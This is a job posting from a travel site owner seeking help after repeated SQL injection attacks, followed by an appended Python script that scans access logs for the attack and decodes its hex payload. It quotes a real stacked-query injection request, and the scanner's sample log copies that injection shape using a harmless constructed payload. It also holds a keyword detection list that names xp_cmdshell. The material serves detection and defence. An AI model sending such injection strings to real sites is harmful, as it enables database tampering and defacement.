We have a growing travel website that has been down for the past two weeks. We have been experiencing repeated attacks: SQL injections that crash our database. Our developer has tried to fix this but has not been able to, due to time allotment (she works on a part-time basis) and the fact that we can't restore the database independently because of the shared hosting environment/knowledge. We have been trying fixes but have not been able to do it yet, and our host has extremely limited availability to restore the DB when it crashes. So I would need someone to review our fixes, show me or teach me how to fix this manually in the code, then copy the database and restore it myself, and then make sure we are tightened up and secure against other attacks. Let's discuss rates and capabilities. The sooner the better.
Here is one of the hacks:
41.232.166.49 - - [30/Jun/2008:17:02:38 +0000] "GET /filename.aspx?letter=A;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(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%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1" 200
Some posts about it:
http://www.secureworks.com/research/blog/index.php/2008/6/4/new-round-of-mass-sql-injections/
http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1318860,00.html
http://www.microsoft.com/technet/security/advisory/954462.mspx
- Location: Somerville
- This is a part-time job.
- This is a contract job.
- Principals only. Recruiters, please don't contact this job poster.
- Please, no phone calls about this job!
- Please do not contact job poster about other services, products or commercial interests.
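As an added example (not part of the job posting or of any of the linked write-ups), here is a small Python script that scans an Apache/IIS combined-format access log for the request pattern shown in the post: it URL-decodes each request target (twice, so double-encoded variants are not missed), flags T-SQL keywords that have no business in a query-string value, and decodes the hex inside `CAST(0x... AS [N]VARCHAR)` so you can read what the injected second stage actually ran. The log lines in it are constructed for the example; the first one copies the shape of the line in the post, but its hex is our own encoding of a harmless SELECT, not the attacker's payload. Note that the request in the post returned 200: the injection succeeded silently, so the web server log, not the error log, is where you find it. Detection is triage only; the fix is still to parameterize the query behind the `letter` parameter.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Combined-format access log line:
# 1.2.3.4 - - [30/Jun/2008:17:02:38 +0000] "GET /x.aspx?a=1 HTTP/1.1" 200
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)

# T-SQL tokens that should never appear in a query-string value of this site
SQLI_MARKERS = re.compile(
    r"\b(DECLARE|CAST|EXEC(?:UTE)?|sp_executesql|xp_cmdshell|sysobjects|syscolumns)\b",
    re.I,
)
# Hex-encoded second stage, as used by the 2008 mass injections:
# CAST(0x... AS VARCHAR(4000)) or AS NVARCHAR(4000)
HEX_CAST = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.I)


def decode_hex_payload(hex_str: str):
    """Decode the hex inside CAST(0x... AS [N]VARCHAR). Returns None if malformed."""
    try:
        raw = bytes.fromhex(hex_str)
    except ValueError:  # odd length or non-hex characters
        return None
    # NVARCHAR payloads are UTF-16LE, so every second byte of ASCII text is NUL
    if len(raw) >= 2 and raw[1] == 0:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def analyze_target(target: str) -> dict:
    """Inspect one request target. Decodes twice to defeat double URL encoding."""
    query = urlsplit(target).query
    decoded = unquote_plus(unquote_plus(query))
    markers = sorted({m.group(1).upper() for m in SQLI_MARKERS.finditer(decoded)})
    payload = None
    m = HEX_CAST.search(decoded)
    if m:
        payload = decode_hex_payload(m.group(1))
    return {
        "suspicious": bool(markers),
        "markers": markers,
        "payload": payload,
        "decoded_query": decoded,
    }


def scan_log(text: str) -> list:
    """Return one finding per suspicious request in an access log."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        result = analyze_target(m.group("target"))
        if result["suspicious"]:
            findings.append(
                {"ip": m.group("ip"), "ts": m.group("ts"), "status": m.group("status"), **result}
            )
    return findings


# Constructed sample log (not real traffic). Line 1 mirrors the shape of the
# request in the post, but the hex is our own encoding of a harmless statement.
# The real 2008 second stage described in the linked advisories was an UPDATE
# that appended a <script> tag to text columns.
_STAGE2 = "SELECT 'constructed sample payload'"
CONSTRUCTED_HEX = _STAGE2.encode("ascii").hex()
SAMPLE_LOG = (
    '41.232.166.49 - - [30/Jun/2008:17:02:38 +0000] '
    f'"GET /filename.aspx?letter=A;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x{CONSTRUCTED_HEX}%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1" 200\n'
    # legitimate requests: plain value, and a value that merely contains "Cast"
    '203.0.113.7 - - [30/Jun/2008:17:05:01 +0000] "GET /filename.aspx?letter=B HTTP/1.1" 200\n'
    '203.0.113.9 - - [30/Jun/2008:17:05:30 +0000] "GET /filename.aspx?letter=Castle HTTP/1.1" 200\n'
    # double-encoded variant (%2520 is %20 encoded again) that a single decode misses
    '203.0.113.8 - - [30/Jun/2008:17:06:42 +0000] "GET /filename.aspx?letter=A%253BDECLARE%2520%40S%2520VARCHAR(4000)%253B-- HTTP/1.1" 500\n'
)

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} markers={f['markers']}")
        if f["payload"]:
            print("  decoded second stage:", f["payload"])
```

Run it against the real log with `scan_log(open("access.log").read())`; anything flagged with status 200 is a request the database most likely executed, so that is the list to hand to whoever reviews the code path for each flagged page.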